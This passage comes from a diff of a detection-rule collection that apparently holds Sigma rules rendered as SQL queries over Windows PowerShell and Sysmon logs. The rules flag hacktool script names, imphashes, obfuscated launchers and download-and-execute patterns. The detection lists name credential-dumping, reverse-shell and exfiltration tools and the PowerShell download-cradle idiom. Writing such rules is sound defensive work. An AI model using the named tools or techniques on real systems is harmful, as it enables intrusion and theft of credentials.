'%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE 
'%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND 
ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', 
'1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', 
'09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 
